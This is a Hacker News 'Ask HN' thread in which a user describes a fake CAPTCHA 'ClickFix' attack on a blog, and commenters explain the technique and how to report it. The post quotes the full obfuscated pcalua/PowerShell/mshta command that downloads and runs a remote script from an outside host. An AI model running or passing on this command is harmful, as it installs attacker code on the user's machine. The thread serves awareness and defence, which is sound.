frontpage.
newsnewestaskshowjobs

Open Source @Github

fp.

Open in hackernews

Ask HN: Crooked Timber showed showed me a virus captcha, What now?

25•Jgoauh•1h ago
Hello everyone, This morning, as i started my shift, i thought i would start visiting some news blogs / websites to kick off the day. When it got to Crooked Timber i saw a captcha page instead, it looked like a traditional Google captcha. I clicked it, the spinner spun, and a box opened on the right, showing the traditional "Verify you're human" white title on a blue background.

It showed 2 "Manual Verification Steps" : 1. Press Win + R 2. Press Ctrl + V and press Run

At first i assumed it was a new type of captcha checking i a physical keyboard was attached to the browser. But i instantly recognized the attempt to make me run a script on my machine.

I opened a new type and to my surprise, the something new was in my clipboard : "pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi""

I submited it to one of LLMs my work gives me access to, which told me to absolutly not run it (i wasn't planning to) and explained the command would download and run a script from the URL.

How do i protect myself from these scams / hack attempts in the future ? i always tought of myself "prepared" but i was surprised.

Has this happened to you before ? How do you protect yourself ?

Comments

baggachipz•1h ago
> showed showed
ABoltzmannMush•57m ago
Reporting to https://safebrowsing.google.com/safebrowsing/report_phish/, which if their tests reproduce the problem will make most browsers unwilling to load the domain. Generally ether caused by a hacked CMS or bad advertisement.
goodmythical•35m ago
VT says no bueno: https://www.virustotal.com/gui/url/4812564b97c63e1607e9182d0...
everdrive•55m ago
This is called a "ClickFix" attack. There is really _never_ a time when a CAPTCHA will require you to execute code on your machine.

The attack is basically getting someone to accidentally run malicious code.

- ctrl + R brings up the Windows "run" dialogue.

- the code executes a powershell command that reaches out to a remote server

- if successful, the remote server answers and you have installed a dropper or something.

Really, you should never do _anything_ like this for any website. You don't need to protect yourself. This is sort of equivalent (in the strict metaphorical sense) of getting a call from your bank and they ask you for your banking password: you just never do it, no matter what. Same thing here. You don't ever execute code via the run dialogue to solve a CAPTHCA. Never.

https://www.sentinelone.com/blog/how-clickfix-is-weaponizing...

nubinetwork•24m ago
$dayjob just sent out a corporate wide email saying the same thing... I guess it's starting to go around... it's been a while since I've seen a fake website telling people to eg. disable UAC.
tasuki•2m ago
> There is really _never_ a time when a CAPTCHA will require you to execute code on your machine.

I think the concern is the user not knowing they're executing code on their machine.

And as a counterexample: some captchas require you to compute something expensive to prove you're not a llm scraper or whatever. It's normal for captchas to require you to execute code on your machine, it's just usually done within the browser's sandbox.

And anyway, these things are completely incomprehensible to non-technical users.

sharedptr•54m ago
It’s a typical technique, report it to safe browsing, upload it to VirusTotal, that should be tit flagged quickly
bschne•52m ago
pinged one of the authors on bsky, let's see
joombaga•38m ago
fine-work-team.com has been reported as suspicious. Cloudflare is blocking it now.
kstrauser•35m ago
Not directly answering your questions, but I just wanted to say: Great instincts!

You saw something unusual, then

1. Stopped what you were doing.

2. Investigated to see if this was legitimate or malicious.

3. Identified a place to asked others about it.

4. Formulated a good question with enough background information to help people answer it.

All around good job! Well done.

SirFatty•15m ago
5. Paste the entire command on HN so the aspiring script kiddies have a launching point. 6. ? 7. Profit!
paulyy_y•11m ago
5. Put the malicious payload directly into work AI system.

"Great instincts!" lmao

SoftTalker•33m ago
> How do i protect myself from these scams / hack attempts in the future

Endless vigilance. Scammers are always working on new tricks. You were rightly suspicious and not fooled by this one.

Good4boothee•31m ago
> How do you protect yourself

Was the site itself actually infected(hacked)? If not, then all you need is adblock (like ublock origin). And that was true for last 20 years.

If website actually got hacked then I don't know of any good solutions. It will be flagged soon or later, and new visitors will be blocked by "Google Safe Browsing". Using something like "Qubes OS" might protect you against attacks based on browser zero-days but VMs don't really protect against ClickFix when people usually share clipboard between host and client VMs.

c0n5pir4cy•26m ago
Do you have any browser extensions enabled?

I've seen similar before where it wasn't the page itself that injected it - rather it was injected by a compromised/sold extension that has permissions on all pages.

confusedbucket•20m ago
> Has this happened to you before ?

Almost, recently. I bought a new Mac, needed something reliable to carry around. I never had a Mac or anything from Apple before, so I wasn't familiar with how exactly does it work. I knew homebrew existed, I understood it's similar to Linux/Windows in that not all applications are in the store, but wasn't familiar at all with how those are commonly installed.

Here's what I did:

1. Open Safari, the only browser there was.

2. Typed "claude mac download" in the search bar (needed Cowork).

3. Clicked the first link.

4. Copied the command it told me to, instructing me to run it in terminal.

Only now I realize that there's something fishy about the command; it had base64 payload in it. Didn't run it and took closer look on the page - it was a Claude share (which I quickly scrolled over).

I can admit mistakes, but Google, Apple and Anthropic deserve some blame here, too.

- Google: pushed malware link up top, didn't (distinctly, at least) mark it as a paid result and I'd swear it didn't show me the URL (which I usually always check before clicking, but maybe I just missed it as the search results are rendered differently from Kagi's)

- Safari: hides path by default, so all you see is "claude.ai". Someone probably thought this looked nice, I think it's just borderline idiotic.

- Anthropic: hosts what's essentially a user-content on their main domain.

Also recently saw a few legit projects using base64 in their install one-liners. Please, stop it.

> How do you protect yourself ?

Installed not Safari and made Google not my default search engine, as I always do. That way I at least always know where I am.

bstsb•9m ago
looking at the source code, the entire phishing page is an iframe created through `srcDoc`. the script itself has no command for Mac users to run, so in my case it just copies "Oops..." to my clipboard - the iframe only loads the first time a user visits the page, after which only a tracking script remains.

it also sets some interesting scripts to your LocalStorage, which are evaluated upon each page load. one of them sends a base64 blob containing your device information to another remote server

Retr0id•4m ago
Google is trying to normalize a new "complete the captcha on your phone by scanning a QR code" flow, which I'm sure will be a whole new vector for scams.

7.1 Earthquake in Japan

https://www.data.jma.go.jp/multi/quake/quake_detail.html?eventID=20260728163528&lang=en
598•krembo•7h ago•122 comments

New HIV vaccine shows unprecedented success in preclinical study

https://www.lji.org/news-events/news/post/new-hiv-vaccine-shows-unprecedented-success-in-preclini...
230•codebyaditya•2h ago•101 comments

Harmony Explained: Progress Towards a Scientific Theory of Music (2012)

https://arxiv.org/abs/1202.4212
8•surprisetalk•18m ago•0 comments

Kimi Linear: An Expressive, Efficient Attention Architecture

https://arxiv.org/abs/2510.26692
128•ronfriedhaber•4h ago•43 comments

Show HN: tale.fyi, we deserve a home for fiction

https://tale.fyi/@sam/announcing-tale-fyi-read-or-listen-to-an-entire-book-from-a-single-link
57•samuelcole•2h ago•35 comments

Show HN: Formally verified 3D CSG: Trust 93 lines spec, not 1000 lines AI code

https://github.com/schildep/verified-3d-mesh-intersection
68•permute•2h ago•26 comments

Solving Fermat: Andrew Wiles

https://www.pbs.org/wgbh/nova/proof/wiles.html
35•1970-01-01•18h ago•14 comments

DMARC Has Been Public Since 2012. 68.4% of Domains Still Don't Enforce It

https://ciphercue.com/blog/dmarc-enforcement-gap-rua-fragmentation-2026
75•adulion•5h ago•55 comments

Google's Beyond Zero: Enterprise Security for the AI Era

https://spawn-queue.acm.org/doi/10.1145/3819083
87•jordigg•5h ago•51 comments

Our position on open-weights models

https://www.anthropic.com/news/position-open-weights-models
1085•surprisetalk•17h ago•1564 comments

How to Survive Boiling Water

https://taxa.substack.com/p/how-to-survive-boiling-water
237•cainxinth•4d ago•37 comments

GrapheneOS Defends Data-Wiping Function That Blocked US Border Search

https://www.pcmag.com/news/grapheneos-defends-data-wiping-function-that-blocked-us-border-search
22•pseudolus•21m ago•3 comments

Fast Remediation Is the New Trust Model (JFrog and OpenAI Zero-Day Findings)

https://jfrog.com/blog/jfrog-and-openai-collaboration-on-zero-day-security-findings/
41•882542F3884314B•3h ago•24 comments

Show HN: Scala Tutorials – interactive Scala 3 lessons in the browser

https://scalatutorials.com
50•eranation•3d ago•13 comments

What AI developers could learn from Charles Bukowski?

https://galjot.si/what-ai-developers-could-learn-from-charles-bukowski
42•sedovsek•2h ago•27 comments

About the security content of macOS Tahoe 26.6

https://support.apple.com/en-us/128067
161•andor•5h ago•109 comments

A $500 RL fine-tune of a 9B open model beat frontier models on catalog review

https://fermisense.com/when-machines-take-the-wheel/
273•ilreb•13h ago•90 comments

Mondragon Corporation – a federation of co-operatives

https://en.wikipedia.org/wiki/Mondragon_Corporation
126•brnt•3h ago•22 comments

Show HN: Ctrlb-decompose: Strip the noise from logs before sending to LLMs

https://github.com/ctrlb-hq/ctrlb-decompose
42•ruhani_grover•2h ago•5 comments

Dolmenwood: Fantasy RPG built around the acclaimed Old-School Essentials rules

https://necroticgnome.com/collections/dolmenwood
31•doener•3d ago•11 comments

Ask HN: Crooked Timber showed showed me a virus captcha, What now?

25•Jgoauh•1h ago•18 comments

Usenet Archive Toolkit – process Usenet messages into a searchable archive

https://github.com/wolfpld/usenetarchive
23•bilegeek•5h ago•0 comments

Europe's Ultra-Rich Could Fund a Substantial Part of the EU's Budget

https://www.socialeurope.eu/europes-ultra-rich-could-fund-a-substantial-part-of-the-eus-budget
5•robtherobber•1h ago•0 comments

Show HN: Segue – Save context in one AI, load it in another by a short handle

https://segue.ai/
16•csaguiar•3h ago•6 comments

Benchmarking Opus 5 on SlopCodeBench

https://github.com/humanlayer/advanced-context-engineering-for-coding-agents/blob/main/benchmarki...
362•dhorthy•17h ago•100 comments

VMs can't boot with Network Mode set to Bridged on Apple M5 Pro machines

https://github.com/utmapp/UTM/issues/7658
7•IndySun•2h ago•2 comments

The Origins of Modern Mathematics in Russia

https://valeman.medium.com/the-origins-of-modern-mathematics-in-russia-from-peter-the-great-to-th...
22•ibobev•3d ago•4 comments

Ars Astronomica – English translations of rare Hebrew and Latin astronomy texts

https://arsastronomica.com/
97•sweisman•10h ago•32 comments

Vehicle Motion Cues

https://support.apple.com/guide/iphone/iphone-comfortably-riding-a-vehicle-iph55564cb22/ios
180•Austin_Conlon•14h ago•94 comments

PyTorch: A Reference Language

https://docs.pytorch.org/devlogs/compiler/2026-07-25-pytorch-a-reference-language/
70•matt_d•10h ago•7 comments